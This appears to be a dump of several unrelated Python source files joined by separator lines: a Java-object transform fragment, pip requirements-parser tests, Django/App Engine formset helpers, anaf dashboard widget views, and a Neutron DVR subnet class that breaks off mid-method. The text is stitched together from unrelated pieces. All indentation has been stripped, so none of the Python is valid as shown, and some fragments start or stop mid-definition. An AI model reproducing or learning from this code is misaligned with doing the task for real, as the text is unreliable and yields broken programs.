class JavaList(list, JavaObject):
pass
class JavaMap(dict, JavaObject):
pass
def transform(self, obj):
if obj.get_class().name == "java.util.ArrayList":
# * @serialData The length of the array backing the <tt>ArrayList</tt>
# * instance is emitted (int), followed by all of its elements
# * (each an <tt>Object</tt>) in the proper order.
new_object = self.JavaList()
obj.copy(new_object)
new_object.extend(obj.annotations[1:])
return new_object
if obj.get_class().name == "java.util.LinkedList":
new_object = self.JavaList()
obj.copy(new_object)
new_object.extend(obj.annotations[1:])
return new_object
if obj.get_class().name == "java.util.HashMap":
new_object = self.JavaMap()
obj.copy(new_object)
for i in range((len(obj.annotations)-1)/2):
new_object[obj.annotations[i*2+1]] = obj.annotations[i*2+2]
return new_object
return obj
|
|
import os
import subprocess
from textwrap import dedent
from mock import patch, Mock
import pytest
from pretend import stub
import pip
from pip.exceptions import (RequirementsFileParseError)
from pip.download import PipSession
from pip.index import PackageFinder
from pip.req.req_install import InstallRequirement
from pip.req.req_file import (parse_requirements, process_line, join_lines,
ignore_comments, break_args_options)
@pytest.fixture
def session():
return PipSession()
@pytest.fixture
def finder(session):
return PackageFinder([], [], session=session)
@pytest.fixture
def options(session):
return stub(
isolated_mode=False, default_vcs=None, index_url='default_url',
skip_requirements_regex=False,
format_control=pip.index.FormatControl(set(), set()))
class TestIgnoreComments(object):
"""tests for `ignore_comment`"""
def test_strip_empty_line(self):
lines = ['req1', '', 'req2']
result = ignore_comments(lines)
assert list(result) == ['req1', 'req2']
def test_strip_comment(self):
lines = ['req1', '# comment', 'req2']
result = ignore_comments(lines)
assert list(result) == ['req1', 'req2']
class TestJoinLines(object):
"""tests for `join_lines`"""
def test_join_lines(self):
lines = dedent('''\
line 1
line 2:1 \\
line 2:2
line 3:1 \\
line 3:2 \\
line 3:3
line 4
''').splitlines()
expect = [
'line 1',
'line 2:1 line 2:2',
'line 3:1 line 3:2 line 3:3',
'line 4',
]
assert expect == list(join_lines(lines))
class TestProcessLine(object):
"""tests for `process_line`"""
def test_parser_error(self):
with pytest.raises(RequirementsFileParseError):
list(process_line("--bogus", "file", 1))
def test_only_one_req_per_line(self):
# pkg_resources raises the ValueError
with pytest.raises(ValueError):
list(process_line("req1 req2", "file", 1))
def test_yield_line_requirement(self):
line = 'SomeProject'
filename = 'filename'
comes_from = '-r %s (line %s)' % (filename, 1)
req = InstallRequirement.from_line(line, comes_from=comes_from)
assert repr(list(process_line(line, filename, 1))[0]) == repr(req)
def test_yield_line_constraint(self):
line = 'SomeProject'
filename = 'filename'
comes_from = '-c %s (line %s)' % (filename, 1)
req = InstallRequirement.from_line(
line, comes_from=comes_from, constraint=True)
found_req = list(process_line(line, filename, 1, constraint=True))[0]
assert repr(found_req) == repr(req)
assert found_req.constraint is True
def test_yield_line_requirement_with_spaces_in_specifier(self):
line = 'SomeProject >= 2'
filename = 'filename'
comes_from = '-r %s (line %s)' % (filename, 1)
req = InstallRequirement.from_line(line, comes_from=comes_from)
assert repr(list(process_line(line, filename, 1))[0]) == repr(req)
assert req.req.specs == [('>=', '2')]
def test_yield_editable_requirement(self):
url = 'git+https://url#egg=SomeProject'
line = '-e %s' % url
filename = 'filename'
comes_from = '-r %s (line %s)' % (filename, 1)
req = InstallRequirement.from_editable(url, comes_from=comes_from)
assert repr(list(process_line(line, filename, 1))[0]) == repr(req)
def test_yield_editable_constraint(self):
url = 'git+https://url#egg=SomeProject'
line = '-e %s' % url
filename = 'filename'
comes_from = '-c %s (line %s)' % (filename, 1)
req = InstallRequirement.from_editable(
url, comes_from=comes_from, constraint=True)
found_req = list(process_line(line, filename, 1, constraint=True))[0]
assert repr(found_req) == repr(req)
assert found_req.constraint is True
def test_nested_requirements_file(self, monkeypatch):
line = '-r another_file'
req = InstallRequirement.from_line('SomeProject')
import pip.req.req_file
def stub_parse_requirements(req_url, finder, comes_from, options,
session, wheel_cache, constraint):
return [(req, constraint)]
parse_requirements_stub = stub(call=stub_parse_requirements)
monkeypatch.setattr(pip.req.req_file, 'parse_requirements',
parse_requirements_stub.call)
assert list(process_line(line, 'filename', 1)) == [(req, False)]
def test_nested_constraints_file(self, monkeypatch):
line = '-c another_file'
req = InstallRequirement.from_line('SomeProject')
import pip.req.req_file
def stub_parse_requirements(req_url, finder, comes_from, options,
session, wheel_cache, constraint):
return [(req, constraint)]
parse_requirements_stub = stub(call=stub_parse_requirements)
monkeypatch.setattr(pip.req.req_file, 'parse_requirements',
parse_requirements_stub.call)
assert list(process_line(line, 'filename', 1)) == [(req, True)]
def test_options_on_a_requirement_line(self):
line = 'SomeProject --install-option=yo1 --install-option yo2 '\
'--global-option="yo3" --global-option "yo4"'
filename = 'filename'
req = list(process_line(line, filename, 1))[0]
assert req.options == {
'global_options': ['yo3', 'yo4'],
'install_options': ['yo1', 'yo2']}
def test_set_isolated(self, options):
line = 'SomeProject'
filename = 'filename'
options.isolated_mode = True
result = process_line(line, filename, 1, options=options)
assert list(result)[0].isolated
def test_set_default_vcs(self, options):
url = 'https://url#egg=SomeProject'
line = '-e %s' % url
filename = 'filename'
options.default_vcs = 'git'
result = process_line(line, filename, 1, options=options)
assert list(result)[0].link.url == 'git+' + url
def test_set_finder_no_index(self, finder):
list(process_line("--no-index", "file", 1, finder=finder))
assert finder.index_urls == []
def test_set_finder_index_url(self, finder):
list(process_line("--index-url=url", "file", 1, finder=finder))
assert finder.index_urls == ['url']
def test_set_finder_find_links(self, finder):
list(process_line("--find-links=url", "file", 1, finder=finder))
assert finder.find_links == ['url']
def test_set_finder_extra_index_urls(self, finder):
list(process_line("--extra-index-url=url", "file", 1, finder=finder))
assert finder.index_urls == ['url']
def test_set_finder_allow_external(self, finder):
list(process_line("--allow-external=SomeProject",
"file", 1, finder=finder))
assert finder.allow_external == set(['someproject'])
def test_set_finder_allow_unsafe(self, finder):
list(process_line("--allow-unverified=SomeProject",
"file", 1, finder=finder))
assert finder.allow_unverified == set(['someproject'])
def test_set_finder_use_wheel(self, finder):
list(process_line("--use-wheel", "file", 1, finder=finder))
no_use_wheel_fmt = pip.index.FormatControl(set(), set())
assert finder.format_control == no_use_wheel_fmt
def test_set_finder_no_use_wheel(self, finder):
list(process_line("--no-use-wheel", "file", 1, finder=finder))
no_use_wheel_fmt = pip.index.FormatControl(set([':all:']), set())
assert finder.format_control == no_use_wheel_fmt
def test_noop_always_unzip(self, finder):
# noop, but confirm it can be set
list(process_line("--always-unzip", "file", 1, finder=finder))
def test_noop_finder_no_allow_unsafe(self, finder):
# noop, but confirm it can be set
list(process_line("--no-allow-insecure", "file", 1, finder=finder))
def test_relative_local_find_links(self, finder, monkeypatch):
"""
Test a relative find_links path is joined with the req file directory
"""
req_file = '/path/req_file.txt'
nested_link = '/path/rel_path'
exists_ = os.path.exists
def exists(path):
if path == nested_link:
return True
else:
exists_(path)
monkeypatch.setattr(os.path, 'exists', exists)
list(process_line("--find-links=rel_path", req_file, 1,
finder=finder))
assert finder.find_links == [nested_link]
def test_relative_http_nested_req_files(self, finder, monkeypatch):
"""
Test a relative nested req file path is joined with the req file url
"""
req_file = 'http://me.com/me/req_file.txt'
def parse(*args, **kwargs):
return iter([])
mock_parse = Mock()
mock_parse.side_effect = parse
monkeypatch.setattr(pip.req.req_file, 'parse_requirements', mock_parse)
list(process_line("-r reqs.txt", req_file, 1, finder=finder))
call = mock_parse.mock_calls[0]
assert call[1][0] == 'http://me.com/me/reqs.txt'
def test_relative_local_nested_req_files(self, finder, monkeypatch):
"""
Test a relative nested req file path is joined with the req file dir
"""
req_file = '/path/req_file.txt'
def parse(*args, **kwargs):
return iter([])
mock_parse = Mock()
mock_parse.side_effect = parse
monkeypatch.setattr(pip.req.req_file, 'parse_requirements', mock_parse)
list(process_line("-r reqs.txt", req_file, 1, finder=finder))
call = mock_parse.mock_calls[0]
assert call[1][0] == '/path/reqs.txt'
def test_absolute_local_nested_req_files(self, finder, monkeypatch):
"""
Test an absolute nested req file path
"""
req_file = '/path/req_file.txt'
def parse(*args, **kwargs):
return iter([])
mock_parse = Mock()
mock_parse.side_effect = parse
monkeypatch.setattr(pip.req.req_file, 'parse_requirements', mock_parse)
list(process_line("-r /other/reqs.txt", req_file, 1, finder=finder))
call = mock_parse.mock_calls[0]
assert call[1][0] == '/other/reqs.txt'
def test_absolute_http_nested_req_file_in_local(self, finder, monkeypatch):
"""
Test a nested req file url in a local req file
"""
req_file = '/path/req_file.txt'
def parse(*args, **kwargs):
return iter([])
mock_parse = Mock()
mock_parse.side_effect = parse
monkeypatch.setattr(pip.req.req_file, 'parse_requirements', mock_parse)
list(process_line("-r http://me.com/me/reqs.txt", req_file, 1,
finder=finder))
call = mock_parse.mock_calls[0]
assert call[1][0] == 'http://me.com/me/reqs.txt'
class TestBreakOptionsArgs(object):
def test_no_args(self):
assert ('', '--option') == break_args_options('--option')
def test_no_options(self):
assert ('arg arg', '') == break_args_options('arg arg')
def test_args_short_options(self):
result = break_args_options('arg arg -s')
assert ('arg arg', '-s') == result
def test_args_long_options(self):
result = break_args_options('arg arg --long')
assert ('arg arg', '--long') == result
class TestOptionVariants(object):
# this suite is really just testing optparse, but added it anyway
def test_variant1(self, finder):
list(process_line("-i url", "file", 1, finder=finder))
assert finder.index_urls == ['url']
def test_variant2(self, finder):
list(process_line("-i 'url'", "file", 1, finder=finder))
assert finder.index_urls == ['url']
def test_variant3(self, finder):
list(process_line("--index-url=url", "file", 1, finder=finder))
assert finder.index_urls == ['url']
def test_variant4(self, finder):
list(process_line("--index-url url", "file", 1, finder=finder))
assert finder.index_urls == ['url']
def test_variant5(self, finder):
list(process_line("--index-url='url'", "file", 1, finder=finder))
assert finder.index_urls == ['url']
class TestParseRequirements(object):
"""tests for `parse_requirements`"""
@pytest.mark.network
def test_remote_reqs_parse(self):
"""
Test parsing a simple remote requirements file
"""
# this requirements file just contains a comment previously this has
# failed in py3: https://github.com/pypa/pip/issues/760
for req in parse_requirements(
'https://raw.githubusercontent.com/pypa/'
'pip-test-package/master/'
'tests/req_just_comment.txt', session=PipSession()):
pass
def test_multiple_appending_options(self, tmpdir, finder, options):
with open(tmpdir.join("req1.txt"), "w") as fp:
fp.write("--extra-index-url url1 \n")
fp.write("--extra-index-url url2 ")
list(parse_requirements(tmpdir.join("req1.txt"), finder=finder,
session=PipSession(), options=options))
assert finder.index_urls == ['url1', 'url2']
def test_skip_regex(self, tmpdir, finder, options):
options.skip_requirements_regex = '.*Bad.*'
with open(tmpdir.join("req1.txt"), "w") as fp:
fp.write("--extra-index-url Bad \n")
fp.write("--extra-index-url Good ")
list(parse_requirements(tmpdir.join("req1.txt"), finder=finder,
options=options, session=PipSession()))
assert finder.index_urls == ['Good']
def test_join_lines(self, tmpdir, finder):
with open(tmpdir.join("req1.txt"), "w") as fp:
fp.write("--extra-index-url url1 \\\n--extra-index-url url2")
list(parse_requirements(tmpdir.join("req1.txt"), finder=finder,
session=PipSession()))
assert finder.index_urls == ['url1', 'url2']
def test_req_file_parse_no_only_binary(self, data, finder):
list(parse_requirements(
data.reqfiles.join("supported_options2.txt"), finder,
session=PipSession()))
expected = pip.index.FormatControl(set(['fred']), set(['wilma']))
assert finder.format_control == expected
def test_req_file_parse_comment_start_of_line(self, tmpdir, finder):
"""
Test parsing comments in a requirements file
"""
with open(tmpdir.join("req1.txt"), "w") as fp:
fp.write("# Comment ")
reqs = list(parse_requirements(tmpdir.join("req1.txt"), finder,
session=PipSession()))
assert not reqs
def test_req_file_parse_comment_end_of_line_with_url(self, tmpdir, finder):
"""
Test parsing comments in a requirements file
"""
with open(tmpdir.join("req1.txt"), "w") as fp:
fp.write("https://example.com/foo.tar.gz # Comment ")
reqs = list(parse_requirements(tmpdir.join("req1.txt"), finder,
session=PipSession()))
assert len(reqs) == 1
assert reqs[0].link.url == "https://example.com/foo.tar.gz"
def test_req_file_parse_egginfo_end_of_line_with_url(self, tmpdir, finder):
"""
Test parsing comments in a requirements file
"""
with open(tmpdir.join("req1.txt"), "w") as fp:
fp.write("https://example.com/foo.tar.gz#egg=wat")
reqs = list(parse_requirements(tmpdir.join("req1.txt"), finder,
session=PipSession()))
assert len(reqs) == 1
assert reqs[0].name == "wat"
def test_req_file_no_finder(self, tmpdir):
"""
Test parsing a requirements file without a finder
"""
with open(tmpdir.join("req.txt"), "w") as fp:
fp.write("""
--find-links https://example.com/
--index-url https://example.com/
--extra-index-url https://two.example.com/
--no-use-wheel
--no-index
--allow-external foo
--allow-all-external
--allow-insecure foo
--allow-unverified foo
""")
parse_requirements(tmpdir.join("req.txt"), session=PipSession())
def test_install_requirements_with_options(self, tmpdir, finder, session,
options):
global_option = '--dry-run'
install_option = '--prefix=/opt'
content = '''
--only-binary :all:
INITools==2.0 --global-option="{global_option}" \
--install-option "{install_option}"
'''.format(global_option=global_option, install_option=install_option)
req_path = tmpdir.join('requirements.txt')
with open(req_path, 'w') as fh:
fh.write(content)
req = next(parse_requirements(
req_path, finder=finder, options=options, session=session))
req.source_dir = os.curdir
with patch.object(subprocess, 'Popen') as popen:
popen.return_value.stdout.readline.return_value = ""
try:
req.install([])
except:
pass
call = popen.call_args_list[0][0][0]
assert call.index(install_option) > \
call.index('install') > \
call.index(global_option) > 0
assert options.format_control.no_binary == set([':all:'])
assert options.format_control.only_binary == set([])
def test_allow_all_external(self, tmpdir):
req_path = tmpdir.join("requirements.txt")
with open(req_path, "w") as fh:
fh.write("""
--allow-all-external
foo
""")
list(parse_requirements(req_path, session=PipSession()))
|
|
from copy import deepcopy
import re
from django import forms
from django.utils.datastructures import SortedDict, MultiValueDict
from django.utils.html import conditional_escape
from django.utils.encoding import StrAndUnicode, smart_unicode, force_unicode
from django.utils.safestring import mark_safe
from django.forms.widgets import flatatt
from google.appengine.ext import db
from ragendja.dbutils import transaction
class FakeModelIterator(object):
def __init__(self, fake_model):
self.fake_model = fake_model
def __iter__(self):
for item in self.fake_model.all():
yield (item.get_value_for_datastore(), unicode(item))
class FakeModelChoiceField(forms.ChoiceField):
def __init__(self, fake_model, *args, **kwargs):
self.fake_model = fake_model
kwargs['choices'] = ()
super(FakeModelChoiceField, self).__init__(*args, **kwargs)
def _get_choices(self):
return self._choices
def _set_choices(self, choices):
self._choices = self.widget.choices = FakeModelIterator(self.fake_model)
choices = property(_get_choices, _set_choices)
def clean(self, value):
value = super(FakeModelChoiceField, self).clean(value)
return self.fake_model.make_value_from_datastore(value)
class FakeModelMultipleChoiceField(forms.MultipleChoiceField):
def __init__(self, fake_model, *args, **kwargs):
self.fake_model = fake_model
kwargs['choices'] = ()
super(FakeModelMultipleChoiceField, self).__init__(*args, **kwargs)
def _get_choices(self):
return self._choices
def _set_choices(self, choices):
self._choices = self.widget.choices = FakeModelIterator(self.fake_model)
choices = property(_get_choices, _set_choices)
def clean(self, value):
value = super(FakeModelMultipleChoiceField, self).clean(value)
return [self.fake_model.make_value_from_datastore(item)
for item in value]
class FormWithSets(object):
def __init__(self, form, formsets=()):
self.form = form
setattr(self, '__module__', form.__module__)
setattr(self, '__name__', form.__name__ + 'WithSets')
setattr(self, '__doc__', form.__doc__)
self._meta = form._meta
fields = [(name, field) for name, field in form.base_fields.iteritems() if isinstance(field, FormSetField)]
formset_dict = dict(formsets)
newformsets = []
for name, field in fields:
if formset_dict.has_key(name):
continue
newformsets.append((name, {'formset':field.make_formset(form._meta.model)}))
self.formsets = formsets + tuple(newformsets)
def __call__(self, *args, **kwargs):
prefix = kwargs['prefix'] + '-' if 'prefix' in kwargs else ''
form = self.form(*args, **kwargs)
if 'initial' in kwargs:
del kwargs['initial']
formsets = []
for name, formset in self.formsets:
kwargs['prefix'] = prefix + name
instance = formset['formset'](*args, **kwargs)
if form.base_fields.has_key(name):
field = form.base_fields[name]
else:
field = FormSetField(formset['formset'].model, **formset)
formsets.append(BoundFormSet(field, instance, name, formset))
return type(self.__name__ + 'Instance', (FormWithSetsInstance, ), {})(self, form, formsets)
def pretty_name(name):
"Converts 'first_name' to 'First name'"
name = name[0].upper() + name[1:]
return name.replace('_', ' ')
table_sections_re = re.compile(r'^(.*?)(<tr>.*</tr>)(.*?)$', re.DOTALL)
table_row_re = re.compile(r'(<tr>(<th><label.*?</label></th>)(<td>.*?</td>)</tr>)', re.DOTALL)
ul_sections_re = re.compile(r'^(.*?)(<li>.*</li>)(.*?)$', re.DOTALL)
ul_row_re = re.compile(r'(<li>(<label.*?</label>)(.*?)</li>)', re.DOTALL)
p_sections_re = re.compile(r'^(.*?)(<p>.*</p>)(.*?)$', re.DOTALL)
p_row_re = re.compile(r'(<p>(<label.*?</label>)(.*?)</p>)', re.DOTALL)
label_re = re.compile(r'^(.*)<label for="id_(.*?)">(.*)</label>(.*)$')
class BoundFormSet(StrAndUnicode):
def __init__(self, field, formset, name, args):
self.field = field
self.formset = formset
self.name = name
self.args = args
if self.field.label is None:
self.label = pretty_name(name)
else:
self.label = self.field.label
self.auto_id = self.formset.auto_id % self.formset.prefix
if args.has_key('attrs'):
self.attrs = args['attrs'].copy()
else:
self.attrs = {}
def __unicode__(self):
"""Renders this field as an HTML widget."""
return self.as_widget()
def as_widget(self, attrs=None):
"""
Renders the field by rendering the passed widget, adding any HTML
attributes passed as attrs. If no widget is specified, then the
field's default widget will be used.
"""
attrs = attrs or {}
auto_id = self.auto_id
if auto_id and 'id' not in attrs and not self.args.has_key('id'):
attrs['id'] = auto_id
try:
data = self.formset.as_table()
name = self.name
return self.render(name, data, attrs=attrs)
except Exception, e:
import traceback
return traceback.format_exc()
def render(self, name, value, attrs=None):
table_sections = table_sections_re.search(value).groups()
output = []
heads = []
current_row = []
first_row = True
first_head_id = None
prefix = 'id_%s-%%s-' % self.formset.prefix
for row, head, item in table_row_re.findall(table_sections[1]):
if first_row:
head_groups = label_re.search(head).groups()
if first_head_id == head_groups[1]:
first_row = False
output.append(current_row)
current_row = []
else:
heads.append('%s%s%s' % (head_groups[0], head_groups[2], head_groups[3]))
if first_head_id is None:
first_head_id = head_groups[1].replace('-0-','-1-')
current_row.append(item)
if not first_row and len(current_row) >= len(heads):
output.append(current_row)
current_row = []
if len(current_row) != 0:
raise Exception('Unbalanced render')
return mark_safe(u'%s<table%s><tr>%s</tr><tr>%s</tr></table>%s'%(
table_sections[0],
flatatt(attrs),
u''.join(heads),
u'</tr><tr>'.join((u''.join(x) for x in output)),
table_sections[2]))
class CachedQuerySet(object):
def __init__(self, get_queryset):
self.queryset_results = (x for x in get_queryset())
def __call__(self):
return self.queryset_results
class FormWithSetsInstance(object):
def __init__(self, master, form, formsets):
self.master = master
self.form = form
self.formsets = formsets
self.instance = form.instance
def __unicode__(self):
return self.as_table()
def is_valid(self):
result = self.form.is_valid()
for bf in self.formsets:
result = bf.formset.is_valid() and result
return result
def save(self, *args, **kwargs):
def save_forms(forms, obj=None):
for form in forms:
if not instance and form != self.form:
for row in form.forms:
row.cleaned_data[form.rel_name] = obj
form_obj = form.save(*args, **kwargs)
if form == self.form:
obj = form_obj
return obj
instance = self.form.instance
grouped = [self.form]
ungrouped = []
# cache the result of get_queryset so that it doesn't run inside the transaction
for bf in self.formsets:
if bf.formset.rel_name == 'parent':
grouped.append(bf.formset)
else:
ungrouped.append(bf.formset)
bf.formset_get_queryset = bf.formset.get_queryset
bf.formset.get_queryset = CachedQuerySet(bf.formset_get_queryset)
obj = db.run_in_transaction(save_forms, grouped)
save_forms(ungrouped, obj)
for bf in self.formsets:
bf.formset.get_queryset = bf.formset_get_queryset
del bf.formset_get_queryset
return obj
def _html_output(self, form_as, normal_row, help_text_html, sections_re, row_re):
formsets = SortedDict()
for bf in self.formsets:
if bf.label:
label = conditional_escape(force_unicode(bf.label))
# Only add the suffix if the label does not end in
# punctuation.
if self.form.label_suffix:
if label[-1] not in ':?.!':
label += self.form.label_suffix
label = label or ''
else:
label = ''
if bf.field.help_text:
help_text = help_text_html % force_unicode(bf.field.help_text)
else:
help_text = u''
formsets[bf.name] = normal_row % {'label': force_unicode(label), 'field': unicode(bf), 'help_text': help_text}
try:
output = []
data = form_as()
section_search = sections_re.search(data)
if not section_search:
output.append(data)
else:
section_groups = section_search.groups()
for row, head, item in row_re.findall(section_groups[1]):
head_search = label_re.search(head)
if head_search:
id = head_search.groups()[1]
if formsets.has_key(id):
row = formsets[id]
del formsets[id]
output.append(row)
for name, row in formsets.items():
if name in self.form.fields.keyOrder:
output.append(row)
return mark_safe(u'\n'.join(output))
except Exception,e:
import traceback
return traceback.format_exc()
def as_table(self):
"Returns this form rendered as HTML <tr>s -- excluding the <table></table>."
return self._html_output(self.form.as_table, u'<tr><th>%(label)s</th><td>%(help_text)s%(field)s</td></tr>', u'<br />%s', table_sections_re, table_row_re)
def as_ul(self):
"Returns this form rendered as HTML <li>s -- excluding the <ul></ul>."
return self._html_output(self.form.as_ul, u'<li>%(label)s %(help_text)s%(field)s</li>', u' %s', ul_sections_re, ul_row_re)
def as_p(self):
"Returns this form rendered as HTML <p>s."
return self._html_output(self.form.as_p, u'<p>%(label)s %(help_text)s</p>%(field)s', u' %s', p_sections_re, p_row_re)
def full_clean(self):
self.form.full_clean()
for bf in self.formsets:
bf.formset.full_clean()
def has_changed(self):
result = self.form.has_changed()
for bf in self.formsets:
result = bf.formset.has_changed() or result
return result
def is_multipart(self):
result = self.form.is_multipart()
for bf in self.formsets:
result = bf.formset.is_multipart() or result
return result
from django.forms.fields import Field
from django.forms.widgets import Widget
from django.forms.models import inlineformset_factory
class FormSetWidget(Widget):
def __init__(self, field, attrs=None):
super(FormSetWidget, self).__init__(attrs)
self.field = field
def render(self, name, value, attrs=None):
if value is None: value = 'FormWithSets decorator required to render %s FormSet' % self.field.model.__name__
value = force_unicode(value)
final_attrs = self.build_attrs(attrs, name=name)
return mark_safe(conditional_escape(value))
class FormSetField(Field):
def __init__(self, model, widget=FormSetWidget, label=None, initial=None,
help_text=None, error_messages=None, show_hidden_initial=False,
formset_factory=inlineformset_factory, *args, **kwargs):
widget = widget(self)
super(FormSetField, self).__init__(required=False, widget=widget, label=label, initial=initial, help_text=help_text, error_messages=error_messages, show_hidden_initial=show_hidden_initial)
self.model = model
self.formset_factory = formset_factory
self.args = args
self.kwargs = kwargs
def make_formset(self, parent_model):
return self.formset_factory(parent_model, self.model, *self.args, **self.kwargs)
|
|
"""
Core module Dashboard views
"""
from anaf.core.rendering import render_to_response
from django.shortcuts import get_object_or_404
from django.template import RequestContext
from django.http import HttpResponseRedirect
from django.core.urlresolvers import reverse
from anaf.core.decorators import mylogin_required, handle_response_format
from anaf.core.models import Object, Widget
from forms import WidgetForm
from anaf.core.conf import settings
from jinja2 import Markup
import json
import re
import copy
def _preprocess_widget(widget, name):
"Populates widget with missing fields"
module_name = widget['module_name']
import_name = module_name + ".views"
module_views = __import__(import_name, fromlist=[str(module_name)])
if hasattr(module_views, name):
if 'title' not in widget:
widget['title'] = getattr(module_views, name).__doc__
widget = copy.deepcopy(widget)
if 'view' not in widget:
widget['view'] = getattr(module_views, name)
return widget
def _get_all_widgets(request):
"Retrieve widgets from all available modules"
user = request.user.profile
perspective = user.get_perspective()
modules = perspective.get_modules()
widgets = {}
# For each Module in the Perspective get widgets
for module in modules:
try:
import_name = module.name + ".widgets"
module_widget_lib = __import__(
import_name, fromlist=[str(module.name)])
module_widgets = module_widget_lib.get_widgets(request)
# Preprocess widget, ensure it has all required fields
for name in module_widgets:
if 'module_name' not in module_widgets[name]:
module_widgets[name]['module_name'] = module.name
if 'module_title' not in module_widgets[name]:
module_widgets[name]['module_title'] = module.title
module_widgets[name] = _preprocess_widget(
module_widgets[name], name)
widgets.update(module_widgets)
except ImportError:
pass
except AttributeError:
pass
return widgets
def _get_widget(request, module, widget_name):
"Gets a widget by name"
import_name = module.name + ".widgets"
module_widget_lib = __import__(import_name, fromlist=[str(module.name)])
module_widgets = module_widget_lib.get_widgets(request)
widget = {}
# Preprocess widget, ensure it has all required fields
for name in module_widgets:
if name == widget_name:
widget = module_widgets[name]
if 'module_name' not in widget:
widget['module_name'] = module.name
if 'module_title' not in widget:
widget['module_title'] = module.title
widget = _preprocess_widget(widget, widget_name)
break
return widget
def _create_widget_object(request, module_name, widget_name):
"Create a Widget object if one is available for the current user Perspective"
user = request.user.profile
perspective = user.get_perspective()
modules = perspective.get_modules()
obj = None
current_module = modules.filter(name=module_name)
widget = None
if current_module:
current_module = current_module[0]
widget = _get_widget(request, current_module, widget_name)
if widget:
obj = Widget(user=user, perspective=perspective)
obj.module_name = widget['module_name']
obj.widget_name = widget_name
obj.save()
# except Exception:
# pass
return obj
def _get_widget_content(content, response_format='html'):
"Extracts widget content from rendred HTML"
widget_content = ""
regexp = r"<!-- widget_content -->(?P<widget_content>.*?)<!-- /widget_content -->"
if response_format == 'ajax':
try:
ajax_content = json.loads(content)
widget_content = ajax_content['response'][
'content']['module_content']
except:
blocks = re.finditer(regexp, content, re.DOTALL)
for block in blocks:
widget_content = block.group('widget_content').strip()
else:
blocks = re.finditer(regexp, content, re.DOTALL)
for block in blocks:
widget_content = block.group('widget_content').strip()
return Markup(widget_content)
@handle_response_format
@mylogin_required
def index(request, response_format='html'):
"Homepage"
trash = Object.filter_by_request(request, manager=Object.objects.filter(trash=True),
mode='r', filter_trash=False).count()
user = request.user.profile
perspective = user.get_perspective()
widget_objects = Widget.objects.filter(user=user, perspective=perspective)
clean_widgets = []
for widget_object in widget_objects:
try:
module = perspective.get_modules().filter(
name=widget_object.module_name)[0]
widget = _get_widget(request, module, widget_object.widget_name)
if 'view' in widget:
try:
content = unicode(
widget['view'](request, response_format=response_format).content, 'utf_8')
widget_content = _get_widget_content(
content, response_format=response_format)
except Exception, e:
widget_content = ""
if settings.DEBUG:
widget_content = str(e)
widget['content'] = widget_content
if widget:
widget_object.widget = widget
clean_widgets.append(widget_object)
except IndexError:
widget_object.delete()
return render_to_response('core/dashboard/index',
{'trash': trash,
'widgets': clean_widgets},
context_instance=RequestContext(request), response_format=response_format)
@handle_response_format
@mylogin_required
def dashboard_widget_add(request, module_name=None, widget_name=None, response_format='html'):
"Add a Widget to the Dashboard"
trash = Object.filter_by_request(request, manager=Object.objects.filter(trash=True),
mode='r', filter_trash=False).count()
if module_name and widget_name:
widget = _create_widget_object(request, module_name, widget_name)
if widget:
return HttpResponseRedirect(reverse('core_dashboard_index'))
widgets = _get_all_widgets(request)
return render_to_response('core/dashboard/widget_add',
{'trash': trash,
'widgets': widgets},
context_instance=RequestContext(request), response_format=response_format)
@handle_response_format
@mylogin_required
def dashboard_widget_edit(request, widget_id, response_format='html'):
"Edit an existing Widget on the Dashboard"
user = request.user.profile
widget_object = get_object_or_404(Widget, pk=widget_id)
if widget_object.user == user:
perspective = user.get_perspective()
module = perspective.get_modules().filter(
name=widget_object.module_name)[0]
widget = _get_widget(request, module, widget_object.widget_name)
widget_object.widget = widget
if 'view' in widget:
try:
content = unicode(
widget['view'](request, response_format=response_format).content, 'utf_8')
widget_content = _get_widget_content(
content, response_format=response_format)
except Exception:
widget_content = ""
widget['content'] = widget_content
if request.POST:
form = WidgetForm(user, request.POST, instance=widget_object)
if form.is_valid():
form.save()
return HttpResponseRedirect(reverse('core_dashboard_index'))
else:
form = WidgetForm(user, instance=widget_object)
return render_to_response('core/dashboard/widget_edit',
{'widget': widget_object,
'form': form},
context_instance=RequestContext(request), response_format=response_format)
return HttpResponseRedirect(reverse('home'))
@handle_response_format
@mylogin_required
def dashboard_widget_delete(request, widget_id, response_format='html'):
"Delete an existing Widget from the Dashboard"
widget = get_object_or_404(Widget, pk=widget_id)
if widget.user == request.user.profile:
widget.delete()
return HttpResponseRedirect(reverse('core_dashboard_index'))
@handle_response_format
@mylogin_required
def dashboard_widget_arrange(request, panel='left', response_format='html'):
"Arrange widgets with AJAX request"
user = request.user.profile
if panel == 'left' or not panel:
shift = -100
else:
shift = 100
if request.GET and 'id_widget[]' in request.GET:
widget_ids = request.GET.getlist('id_widget[]')
widgets = Widget.objects.filter(user=user, pk__in=widget_ids)
for widget in widgets:
if unicode(widget.id) in widget_ids:
widget.weight = shift + widget_ids.index(unicode(widget.id))
widget.save()
return HttpResponseRedirect(reverse('core_dashboard_index'))
|
|
# Copyright 2014, Hewlett-Packard Development Company, L.P.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_log import log as logging
import oslo_messaging
from oslo_utils import excutils
from neutron.common import constants as n_const
from neutron.common import utils as n_utils
from neutron.i18n import _LE, _LI, _LW
from neutron.plugins.common import constants as p_const
from neutron.plugins.openvswitch.common import constants
LOG = logging.getLogger(__name__)
# A class to represent a DVR-hosted subnet including vif_ports resident on
# that subnet
class LocalDVRSubnetMapping(object):
def __init__(self, subnet, csnat_ofport=constants.OFPORT_INVALID):
# set of commpute ports on on this dvr subnet
self.compute_ports = {}
self.subnet = subnet
self.csnat_ofport = csnat_ofport
self.dvr_owned = False
def __str__(self):
return ("subnet = %s compute_ports = %s csnat_port = %s"
" is_dvr_owned = %s" %
(self.subnet, self.get_compute_ofports(),
self.get_csnat_ofport(), self.is_dvr_owned()))
def get_subnet_info(self):
return self.subnet
def set_dvr_owned(self, owned):
self.dvr_owned = owned
def is_dvr_owned(self):
return self.dvr_owned
def add_compute_ofport(self, vif_id, ofport):
self.compute_ports[vif_id] = ofport
def remove_compute_ofport(self, vif_id):
self.compute_ports.pop(vif_id, 0)
def remove_all_compute_ofports(self):
self.compute_ports.clear()
def get_compute_ofports(self):
return self.compute_ports
def set_csnat_ofport(self, ofport):
